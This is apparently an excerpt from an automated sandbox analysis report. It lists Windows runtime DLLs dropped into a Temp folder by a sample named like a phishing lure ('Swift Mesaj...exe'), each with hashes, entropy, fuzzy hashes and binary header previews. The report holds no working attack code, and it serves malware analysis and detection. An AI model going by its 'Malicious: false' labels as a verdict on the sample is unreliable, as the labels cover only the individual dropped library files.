MD5:	EFF11130BFE0D9C90C0026BF2FB219AE
SHA1:	CF4C89A6E46090D3D8FEEB9EB697AEA8A26E4088
SHA-256:	03AD57C24FF2CF895B5F533F0ECBD10266FD8634C6B9053CC9CB33B814AD5D97
SHA-512:	8133FB9F6B92F498413DB3140A80D6624A705F80D9C7AE627DFD48ADEB8C5305A61351BF27BBF02B4D3961F9943E26C55C2A66976251BB61EF1537BC8C212ADD
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...S.v............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....S.v.........@...T...T.......S.v.........d...............S.v.....................RSDS..pS...Z4Yr.E@......api-ms-win-core-localization-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................S.v.....v.......;...;...(.......................<...f.......................5...]...................!...I...q...................N.............../...j.............../...^.................../...\...................8...`...........

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-memory-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.101895292899441
Encrypted:	false
SSDEEP:	384:+bZWPhWUsnhi00GftpBjwBemQlD16Par7:b4nhoi6BedH
MD5:	D500D9E24F33933956DF0E26F087FD91
SHA1:	6C537678AB6CFD6F3EA0DC0F5ABEFD1C4924F0C0
SHA-256:	BB33A9E906A5863043753C44F6F8165AFE4D5EDB7E55EFA4C7E6E1ED90778ECA
SHA-512:	C89023EB98BF29ADEEBFBCB570427B6DF301DE3D27FF7F4F0A098949F987F7C192E23695888A73F1A2019F1AF06F2135F919F6C606A07C8FA9F07C00C64A34B5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....%(...........!......................... ...............................0............@.............................l............ ..................8=..............T............................................................................text...l........................... ..`.rsrc........ ......................@..@......%(........:...T...T.........%(........d.................%(....................RSDS.~....%.T.....CO....api-ms-win-core-memory-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......l....edata... ..`....rsrc$01....` .......rsrc$02......................%(....................(...h...........)...P...w...................C...g...................%...P...........B...g...................4...[...\|...................=...................................api-ms-win-core-memory-l1-1-0.dl

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-namedpipe-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.16337963516533
Encrypted:	false
SSDEEP:	192:pgWIghWGZiBeS123Ouo+Uggs/nGfe4pBjS/fE/hWh0txKdmVWQ4GWoxYyqnaj/6B:iWPhWUEi00GftpBj1temnltcwWB
MD5:	6F6796D1278670CCE6E2D85199623E27
SHA1:	8AA2155C3D3D5AA23F56CD0BC507255FC953CCC3
SHA-256:	C4F60F911068AB6D7F578D449BA7B5B9969F08FC683FD0CE8E2705BBF061F507
SHA-512:	6E7B134CA930BB33D2822677F31ECA1CB6C1DFF55211296324D2EA9EBDC7C01338F07D22A10C5C5E1179F14B1B5A4E3B0BAFB1C8D39FCF1107C57F9EAF063A7B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L... ..............!......................... ...............................0.......-....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.... ...........=...T...T....... ...........d............... .......................RSDS...IK..XM.&......api-ms-win-core-namedpipe-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................ .......................(...P...x...............:...w...............O...y...............&...W...............=...j.......................api-ms-win-core-namedpipe-l1-1-0.dll.ConnectNamedPipe.kernel32.ConnectNamedPipe.CreateNamedP

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-processenvironment-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19248
Entropy (8bit):	7.073730829887072
Encrypted:	false
SSDEEP:	192:wXjWIghWGd4dsNtL/123Ouo+Uggs/nGfe4pBjSXcYddWh0txKdmVWQ4SW04engo5:MjWPhWHsnhi00GftpBjW7emOj5l1z6hP
MD5:	5F73A814936C8E7E4A2DFD68876143C8
SHA1:	D960016C4F553E461AFB5B06B039A15D2E76135E
SHA-256:	96898930FFB338DA45497BE019AE1ADCD63C5851141169D3023E53CE4C7A483E
SHA-512:	77987906A9D248448FA23DB2A634869B47AE3EC81EA383A74634A8C09244C674ECF9AADCDE298E5996CAFBB8522EDE78D08AAA270FD43C66BEDE24115CDBDFED
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...).r............!......................... ...............................0.......:....@.............................G............ ..................0=..............T............................................................................text...G........................... ..`.rsrc........ ......................@..@....).r.........F...T...T.......).r.........d...............).r.....................RSDS.6..~x.......'......api-ms-win-core-processenvironment-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......G....edata... ..`....rsrc$01....` .......rsrc$02........).r.....................(...\|.......B...............$...M...{...............P...................6...k.............../...(...e...............=...f...............8...q...............!...T............... ...........................

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-processthreads-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19392
Entropy (8bit):	7.082421046253008
Encrypted:	false
SSDEEP:	384:afk1JzNcKSIJWPhW2snhi00GftpBjZqcLvemr4PlgC:RcKST+nhoi/BbeGv
MD5:	A2D7D7711F9C0E3E065B2929FF342666
SHA1:	A17B1F36E73B82EF9BFB831058F187535A550EB8
SHA-256:	9DAB884071B1F7D7A167F9BEC94BA2BEE875E3365603FA29B31DE286C6A97A1D
SHA-512:	D436B2192C4392A041E20506B2DFB593FE5797F1FDC2CDEB2D7958832C4C0A9E00D3AEA6AA1737D8A9773817FEADF47EE826A6B05FD75AB0BDAE984895C2C4EF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!......................... ...............................0......l.....@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@................B...T...T...................d.......................................RSDS..t........=j.......api-ms-win-core-processthreads-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............................1...1...(...........K...x...............,...`...................C...q...............'...N...y..............."...I...{...............B...p...............,...c...............H...x...................9...S...p.......

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-processthreads-l1-1-1.dll

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.1156948849491055
Encrypted:	false
SSDEEP:	384:xzADfIeRWPhWKEi00GftpBjj1emMVlvN0M:xzfeWeoi11ep
MD5:	D0289835D97D103BAD0DD7B9637538A1
SHA1:	8CEEBE1E9ABB0044808122557DE8AAB28AD14575
SHA-256:	91EEB842973495DEB98CEF0377240D2F9C3D370AC4CF513FD215857E9F265A6A
SHA-512:	97C47B2E1BFD45B905F51A282683434ED784BFB334B908BF5A47285F90201A23817FF91E21EA0B9CA5F6EE6B69ACAC252EEC55D895F942A94EDD88C4BFD2DAFD
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....9.............!......................... ...............................0......k.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....9..........B...T...T........9..........d................9......................RSDS&.n....5..l....)....api-ms-win-core-processthreads-l1-1-1.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............9......................(...`...........-...l..........."...W...................N...................P...............F...q...............3...r...................................api-ms-win-core-processthreads-l1-1-1.dll.FlushInstr

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-profile-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	17712
Entropy (8bit):	7.187691342157284
Encrypted:	false
SSDEEP:	192:w9WIghWGdUuDz7M123Ouo+Uggs/nGfe4pBjSXrw58h6Wh0txKdmVWQ4SW7QQtzko:w9WPhWYDz6i00GftpBjXPemD5l1z6hv
MD5:	FEE0926AA1BF00F2BEC9DA5DB7B2DE56
SHA1:	F5A4EB3D8AC8FB68AF716857629A43CD6BE63473
SHA-256:	8EB5270FA99069709C846DB38BE743A1A80A42AA1A88776131F79E1D07CC411C
SHA-512:	0958759A1C4A4126F80AA5CDD9DF0E18504198AEC6828C8CE8EB5F615AD33BF7EF0231B509ED6FD1304EEAB32878C5A649881901ABD26D05FD686F5EBEF2D1C3
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....&............!......................... ...............................0......0.....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....&.........;...T...T........&.........d................&.....................RSDS...O.""#.n....D:....api-ms-win-core-profile-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................&.....<...............(...0...8...w......._...........api-ms-win-core-profile-l1-1-0.dll.QueryPerformanceCounter.kernel32.QueryPerformanceCounter.QueryPerformanceFrequency.kernel32.QueryPerformanceFrequency....................

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-rtlsupport-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	17720
Entropy (8bit):	7.19694878324007
Encrypted:	false
SSDEEP:	384:61G1WPhWksnhi00GftpBjEVXremWRlP55Jk:kGiYnhoiqVXreDT5Y
MD5:	FDBA0DB0A1652D86CD471EAA509E56EA
SHA1:	3197CB45787D47BAC80223E3E98851E48A122EFA
SHA-256:	2257FEA1E71F7058439B3727ED68EF048BD91DCACD64762EB5C64A9D49DF0B57
SHA-512:	E5056D2BD34DC74FC5F35EA7AA8189AAA86569904B0013A7830314AE0E2763E95483FABDCBA93F6418FB447A4A74AB0F07712ED23F2E1B840E47A099B1E68E18
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......(...........!......................... ...............................0......}"....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.......(........>...T...T..........(........d..................(....................RSDS?.L.N.o.....=.......api-ms-win-core-rtlsupport-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...................(....F...............(...4...@...~...........l.................api-ms-win-core-rtlsupport-l1-1-0.dll.RtlCaptureContext.ntdll.RtlCaptureContext.RtlCaptureStackBackTrace.ntdll.RtlCaptureStackBackTrace.RtlUnwind.ntdll.RtlUnwind.

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-string-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.137724132900032
Encrypted:	false
SSDEEP:	384:xyMvRWPhWFs0i00GftpBjwCJdemnflUG+zI4:xyMvWWoibeTnn
MD5:	12CC7D8017023EF04EBDD28EF9558305
SHA1:	F859A66009D1CAAE88BF36B569B63E1FBDAE9493
SHA-256:	7670FDEDE524A485C13B11A7C878015E9B0D441B7D8EB15CA675AD6B9C9A7311
SHA-512:	F62303D98EA7D0DDBE78E4AB4DB31AC283C3A6F56DBE5E3640CBCF8C06353A37776BF914CFE57BBB77FC94CCFA48FAC06E74E27A4333FBDD112554C646838929
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....R............!......................... ...............................0.......\....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......R.........:...T...T.........R.........d.................R.....................RSDS..D..a..1.f....7....api-ms-win-core-string-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02......................R.....x...............(...H...h...............)...O...x...........................>...i...........................api-ms-win-core-string-l1-1-0.dll.CompareStringEx.kernel32.CompareStringEx.CompareStringOrdinal.kernel32.Compare

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-synch-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20280
Entropy (8bit):	7.04640581473745
Encrypted:	false
SSDEEP:	384:5Xdv3V0dfpkXc0vVaHWPhWXEi00GftpBj9em+4lndanJ7o:5Xdv3VqpkXc0vVa8poivex
MD5:	71AF7ED2A72267AAAD8564524903CFF6
SHA1:	8A8437123DE5A22AB843ADC24A01AC06F48DB0D3
SHA-256:	5DD4CCD63E6ED07CA3987AB5634CA4207D69C47C2544DFEFC41935617652820F
SHA-512:	7EC2E0FEBC89263925C0352A2DE8CC13DA37172555C3AF9869F9DBB3D627DD1382D2ED3FDAD90594B3E3B0733F2D3CFDEC45BC713A4B7E85A09C164C3DFA3875
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......2...........!......................... ...............................0............@.............................V............ ..................8=..............T............................................................................text...V........................... ..`.rsrc........ ......................@..@.......2........9...T...T..........2........d..................2....................RSDS...z..C...+Q_.....api-ms-win-core-synch-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg.......V....edata... ..`....rsrc$01....` .......rsrc$02.......................2............)...)...(.......p.......1...c...................!...F...m...............$...X...........$...[.......................@...i...............!...Q.......................[...............7...........O...................

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-synch-l1-2-0.dll

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.138910839042951
Encrypted:	false
SSDEEP:	384:JtZ3gWPhWFA0i00GftpBj4Z8wemFfYlP55t:j+oiVweb53
MD5:	0D1AA99ED8069BA73CFD74B0FDDC7B3A
SHA1:	BA1F5384072DF8AF5743F81FD02C98773B5ED147
SHA-256:	30D99CE1D732F6C9CF82671E1D9088AA94E720382066B79175E2D16778A3DAD1
SHA-512:	6B1A87B1C223B757E5A39486BE60F7DD2956BB505A235DF406BCF693C7DD440E1F6D65FFEF7FDE491371C682F4A8BB3FD4CE8D8E09A6992BB131ADDF11EF2BF9
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...XuY...........!......................... ...............................0......3.....@.............................v............ ..................8=..............T............................................................................text...v........................... ..`.rsrc........ ......................@..@....XuY........9...T...T.......XuY........d...............XuY....................RSDS.V..B...`..S3.....api-ms-win-core-synch-l1-2-0.pdb............T....rdata..T........rdata$zzzdbg.......v....edata... ..`....rsrc$01....` .......rsrc$02....................X*uY....................(...l...........R...................W...............&...b...............$...W.......6...w...............;...\|...............H...................A.....................................api-ms-win-core-synch-

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-sysinfo-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19248
Entropy (8bit):	7.072555805949365
Encrypted:	false
SSDEEP:	384:2q25WPhWWsnhi00GftpBj1u6qXxem4l1z6hi:25+SnhoiG6IeA8
MD5:	19A40AF040BD7ADD901AA967600259D9
SHA1:	05B6322979B0B67526AE5CD6E820596CBE7393E4
SHA-256:	4B704B36E1672AE02E697EFD1BF46F11B42D776550BA34A90CD189F6C5C61F92
SHA-512:	5CC4D55350A808620A7E8A993A90E7D05B441DA24127A00B15F96AAE902E4538CA4FED5628D7072358E14681543FD750AD49877B75E790D201AB9BAFF6898C8D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....C=...........!......................... ...............................0............@.............................E............ ..................0=..............T............................................................................text...E........................... ..`.rsrc........ ......................@..@......C=........;...T...T.........C=........d.................C=....................RSDS....T.>eD.#\|.../....api-ms-win-core-sysinfo-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg.......E....edata... ..`....rsrc$01....` .......rsrc$02......................C=....................(...........:...i...............N...................7...s...............+...M...r.............../...'...V...............:...k...................X............... ...?...d..............."...................

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-timezone-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18224
Entropy (8bit):	7.17450177544266
Encrypted:	false
SSDEEP:	384:SWPhWK3di00GftpBjH35Gvem2Al1z6hIu:77NoiOve7eu
MD5:	BABF80608FD68A09656871EC8597296C
SHA1:	33952578924B0376CA4AE6A10B8D4ED749D10688
SHA-256:	24C9AA0B70E557A49DAC159C825A013A71A190DF5E7A837BFA047A06BBA59ECA
SHA-512:	3FFFFD90800DE708D62978CA7B50FE9CE1E47839CDA11ED9E7723ACEC7AB5829FA901595868E4AB029CDFB12137CF8ECD7B685953330D0900F741C894B88257B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....Y.x...........!......................... ...............................0......}3....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....Y.x........<...T...T........Y.x........d................Y.x....................RSDS.^.b. .t.H.a.......api-ms-win-core-timezone-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................Y.x....................(...L...p...........5...s...........+...i...................U...............I.........................api-ms-win-core-timezone-l1-1-0.dll.FileTimeToSystemTime.kernel32.FileTimeToSystemTime.GetDynamicTimeZ

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-util-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.1007227686954275
Encrypted:	false
SSDEEP:	192:pePWIghWG4U9wluZo123Ouo+Uggs/nGfe4pBjSbKT8wuxWh0txKdmVWQ4CWnFnwQ:pYWPhWFS0i00GftpBj7DudemJlP552
MD5:	0F079489ABD2B16751CEB7447512A70D
SHA1:	679DD712ED1C46FBD9BC8615598DA585D94D5D87
SHA-256:	F7D450A0F59151BCEFB98D20FCAE35F76029DF57138002DB5651D1B6A33ADC86
SHA-512:	92D64299EBDE83A4D7BE36F07F65DD868DA2765EB3B39F5128321AFF66ABD66171C7542E06272CB958901D403CCF69ED716259E0556EE983D2973FAA03C55D3E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....f............!......................... ...............................0......`k....@.............................9............ ..................8=..............T............................................................................text...)........................... ..`.rsrc........ ......................@..@......f.........8...T...T.........f.........d.................f.....................RSDS*...$.L.Rm..l.....api-ms-win-core-util-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg.......9....edata... ..`....rsrc$01....` .......rsrc$02..........f.....J...................,...@...o...................j...}.........................api-ms-win-core-util-l1-1-0.dll.Beep.kernel32.Beep.DecodePointer.kernel32.DecodePointer.DecodeSystemPointer.kernel32.DecodeSystemPointer.EncodePointer.kernel3

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-conio-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19256
Entropy (8bit):	7.088693688879585
Encrypted:	false
SSDEEP:	384:8WPhWz4Ri00GftpBjDb7bemHlndanJ7DW:Fm0oiV7beV
MD5:	6EA692F862BDEB446E649E4B2893E36F
SHA1:	84FCEAE03D28FF1907048ACEE7EAE7E45BAAF2BD
SHA-256:	9CA21763C528584BDB4EFEBE914FAAF792C9D7360677C87E93BD7BA7BB4367F2
SHA-512:	9661C135F50000E0018B3E5C119515CFE977B2F5F88B0F5715E29DF10517B196C81694D074398C99A572A971EC843B3676D6A831714AB632645ED25959D5E3E7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.................!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v..............................8...d...d..................d......................................RSDS....<....2..u....api-ms-win-crt-conio-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...............T...............(.......................>...w.........../...W...p...........................,...L...l.......................,...L...m...............t...........'...^...............P...g...........................$...=...

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-convert-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22328
Entropy (8bit):	6.929204936143068
Encrypted:	false
SSDEEP:	384:EuydWPhW7snhi00GftpBjd6t/emJlDbN:3tnhoi6t/eAp
MD5:	72E28C902CD947F9A3425B19AC5A64BD
SHA1:	9B97F7A43D43CB0F1B87FC75FEF7D9EEEA11E6F7
SHA-256:	3CC1377D495260C380E8D225E5EE889CBB2ED22E79862D4278CFA898E58E44D1
SHA-512:	58AB6FEDCE2F8EE0970894273886CB20B10D92979B21CDA97AE0C41D0676CC0CD90691C58B223BCE5F338E0718D1716E6CE59A106901FE9706F85C3ACF7855FF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....NE............!.........................0...............................@............@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@v....................NE.........:...d...d........NE.........d................NE.....................RSDS..e.7P.g^j..[....api-ms-win-crt-convert-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.....................NE.............z...z...8... .......(...C...^...y...........................1...N...k...............................*...E...`...y...............................5...R...o.......................,...M...n...........

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-environment-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18736
Entropy (8bit):	7.078409479204304
Encrypted:	false
SSDEEP:	192:bWIghWGd4edXe123Ouo+Uggs/nGfe4pBjSXXmv5Wh0txKdmVWQ4SWEApkqnajPBZ:bWPhWqXYi00GftpBjBemPl1z6h2
MD5:	AC290DAD7CB4CA2D93516580452EDA1C
SHA1:	FA949453557D0049D723F9615E4F390010520EDA
SHA-256:	C0D75D1887C32A1B1006B3CFFC29DF84A0D73C435CDCB404B6964BE176A61382
SHA-512:	B5E2B9F5A9DD8A482169C7FC05F018AD8FE6AE27CB6540E67679272698BFCA24B2CA5A377FA61897F328B3DEAC10237CAFBD73BC965BF9055765923ABA9478F8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....jU............!......................... ...............................0......G.....@............................."............ ..................0=..............T............................................................................text...2........................... ..`.rsrc........ ......................@..@v....................jU.........>...d...d........jU.........d................jU.....................RSDSu..1.N....R.s,"\....api-ms-win-crt-environment-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg......."....edata... ..`....rsrc$01....` .......rsrc$02.................jU.....................8...............C...d...........................3...O...l....................... .......5...Z...w.......................)...F...a...........................................................

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-filesystem-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20280
Entropy (8bit):	7.085387497246545
Encrypted:	false
SSDEEP:	384:sq6nWm5C1WPhWFK0i00GftpBjB1UemKklUG+zIOd/:x6nWm5CiooiKeZnbd/
MD5:	AEC2268601470050E62CB8066DD41A59
SHA1:	363ED259905442C4E3B89901BFD8A43B96BF25E4
SHA-256:	7633774EFFE7C0ADD6752FFE90104D633FC8262C87871D096C2FC07C20018ED2
SHA-512:	0C14D160BFA3AC52C35FF2F2813B85F8212C5F3AFBCFE71A60CCC2B9E61E51736F0BF37CA1F9975B28968790EA62ED5924FAE4654182F67114BD20D8466C4B8F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......h...........!......................... ...............................0......I.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v......................h........=...d...d..........h........d..................h....................RSDS.....a.'..G...A.....api-ms-win-crt-filesystem-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...................h............A...A...8...<...@...........$...=...V...q...................)...M...q......................./...O...o...........................7...X...v...........................6...U...r.......................

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-heap-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19256
Entropy (8bit):	7.060393359865728
Encrypted:	false
SSDEEP:	192:+Y3vY17aFBR4WIghWG4U9CedXe123Ouo+Uggs/nGfe4pBjSbGGAPWh0txKdmVWQC:+Y3e9WPhWFsXYi00GftpBjfemnlP55s
MD5:	93D3DA06BF894F4FA21007BEE06B5E7D
SHA1:	1E47230A7EBCFAF643087A1929A385E0D554AD15
SHA-256:	F5CF623BA14B017AF4AEC6C15EEE446C647AB6D2A5DEE9D6975ADC69994A113D
SHA-512:	72BD6D46A464DE74A8DAC4C346C52D068116910587B1C7B97978DF888925216958CE77BE1AE049C3DCCF5BF3FFFB21BC41A0AC329622BC9BBC190DF63ABB25C6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...J.o ...........!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v...................J.o ........7...d...d.......J.o ........d...............J.o ....................RSDSq.........pkQX[....api-ms-win-crt-heap-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02........J.o ....6...............(...........c...................S.......................1...V...y.......................<...c...........................U...z...............:...u...................&...E...p.......................,...U...

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-locale-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.13172731865352
Encrypted:	false
